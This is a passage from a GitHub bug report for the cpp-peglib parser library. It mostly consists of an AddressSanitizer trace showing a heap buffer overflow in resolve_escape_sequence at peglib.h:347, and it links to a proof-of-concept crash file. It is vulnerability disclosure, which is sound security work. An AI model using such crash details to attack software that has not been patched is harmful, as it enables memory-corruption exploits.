const::{lambda(peg::any&)#1}) /home/seviezhou/cpppeglib/lint/../peglib.h:880 #57 0x50d5f4 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2532 #58 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #59 0x48c29c in peg::WeakHolder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1450 #60 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #61 0x4df989 in peg::Repetition::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1125 #62 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #63 0x48ffa6 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}::operator()(peg::any&) const (/home/seviezhou/cpppeglib/build/lint/peglint+0x48ffa6) #64 0x50d5f4 in void peg::Context::packrat<peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}>(char const*, unsigned long, unsigned long&, peg::any&, peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}) /home/seviezhou/cpppeglib/lint/../peglib.h:880 #65 0x50d5f4 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2532 #66 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #67 0x48c29c in peg::WeakHolder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1450 #68 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #69 0x4a90fa in peg::Sequence::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1010 #70 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #71 0x48ffa6 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}::operator()(peg::any&) const (/home/seviezhou/cpppeglib/build/lint/peglint+0x48ffa6) #72 0x50d5f4 in void peg::Context::packrat<peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}>(char const*, unsigned long, unsigned long&, peg::any&, peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}) /home/seviezhou/cpppeglib/lint/../peglib.h:880 #73 0x50d5f4 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2532 #74 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #75 0x48c29c in peg::WeakHolder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1450 #76 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #77 0x4a961a in peg::Sequence::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1010 #78 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #79 0x4ddae7 in peg::PrioritizedChoice::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1058 #80 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #81 0x48ffa6 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}::operator()(peg::any&) const (/home/seviezhou/cpppeglib/build/lint/peglint+0x48ffa6) #82 0x50d5f4 in void peg::Context::packrat<peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}>(char const*, unsigned long, unsigned long&, peg::any&, peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}) /home/seviezhou/cpppeglib/lint/../peglib.h:880 #83 0x50d5f4 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2532 #84 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #85 0x48c29c in peg::WeakHolder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1450 #86 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #87 0x4df989 in peg::Repetition::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1125 #88 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #89 0x4a92e6 in peg::Sequence::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:1010 #90 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #91 0x48ffa6 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}::operator()(peg::any&) const (/home/seviezhou/cpppeglib/build/lint/peglint+0x48ffa6) #92 0x50d5f4 in void peg::Context::packrat<peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}>(char const*, unsigned long, unsigned long&, peg::any&, peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const::{lambda(peg::any&)#1}) /home/seviezhou/cpppeglib/lint/../peglib.h:880 #93 0x50d5f4 in peg::Holder::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2532 #94 0x45be13 in peg::Ope::parse(char const*, unsigned long, peg::SemanticValues&, peg::Context&, peg::any&) const /home/seviezhou/cpppeglib/lint/../peglib.h:2440 #95 0x512115 in peg::Definition::parse_core(char const*, unsigned long, peg::SemanticValues&, peg::any&, char const*) const /home/seviezhou/cpppeglib/lint/../peglib.h:2345 #96 0x527a1a in peg::Definition::parse(char const*, unsigned long, peg::any&, char const*) const /home/seviezhou/cpppeglib/lint/../peglib.h:2227 #97 0x527a1a in peg::ParserGenerator::perform_core(char const*, unsigned long, std::unordered_map<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::shared_ptr<peg::Ope>, std::hash<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::equal_to<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::allocator<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, std::shared_ptr<peg::Ope> > > > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::function<void (unsigned long, unsigned long, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)>) /home/seviezhou/cpppeglib/lint/../peglib.h:3396 #98 0x557b83 in peg::ParserGenerator::parse(char const*, unsigned long, std::unordered_map<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::shared_ptr<peg::Ope>, std::hash<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::equal_to<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::allocator<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, std::shared_ptr<peg::Ope> > > > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::function<void (unsigned long, unsigned long, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)>) /home/seviezhou/cpppeglib/lint/../peglib.h:2880 #99 0x557b83 in peg::parser::load_grammar(char const*, unsigned long, std::unordered_map<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::shared_ptr<peg::Ope>, std::hash<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::equal_to<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >, std::allocator<std::pair<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const, std::shared_ptr<peg::Ope> > > > const&) /home/seviezhou/cpppeglib/lint/../peglib.h:3850 #100 0x557b83 in peg::parser::load_grammar(char const*, unsigned long) /home/seviezhou/cpppeglib/lint/../peglib.h:3855 #101 0x429e66 in main /home/seviezhou/cpppeglib/lint/peglint.cc:111 #102 0x7fc56923a83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #103 0x42b888 in _start (/home/seviezhou/cpppeglib/build/lint/peglint+0x42b888) 0x61a00001f71b is located 0 bytes to the right of 1179-byte region [0x61a00001f280,0x61a00001f71b) allocated by thread T0 here: #0 0x7fc569e95532 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99532) #1 0x46139e in __gnu_cxx::new_allocator<char>::allocate(unsigned long, void const*) /usr/include/c++/5/ext/new_allocator.h:104 #2 0x46139e in std::allocator_traits<std::allocator<char> >::allocate(std::allocator<char>&, unsigned long) /usr/include/c++/5/bits/alloc_traits.h:491 #3 0x46139e in std::_Vector_base<char, std::allocator<char> >::_M_allocate(unsigned long) /usr/include/c++/5/bits/stl_vector.h:170 #4 0x46139e in std::vector<char, std::allocator<char> >::_M_default_append(unsigned long) /usr/include/c++/5/bits/vector.tcc:557 #5 0x46139e in std::vector<char, std::allocator<char> >::resize(unsigned long) /usr/include/c++/5/bits/stl_vector.h:676 #6 0x46139e in read_file(char const*, std::vector<char, std::allocator<char> >&) /home/seviezhou/cpppeglib/lint/peglint.cc:18 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/cpppeglib/lint/../peglib.h:347 peg::resolve_escape_sequence[abi:cxx11](char const*, unsigned long) Shadow bytes around the buggy address: 0x0c347fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c347fffbee0: 00 00 00[03]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==23131==ABORTING ``` ## POC [heap-overflow-resolve_escape_sequence-peglib-347.zip](https://github.com/yhirose/cpp-peglib/files/5041101/heap-overflow-resolve_escape_sequence-peglib-347.zip)
A heap overflow in peglib.h:347
https://api.github.com/repos/yhirose/cpp-peglib/issues/122/comments
9
2020-08-07T11:41:48Z
2021-07-20T08:33:08Z
https://github.com/yhirose/cpp-peglib/issues/122
674,959,219
122
1,872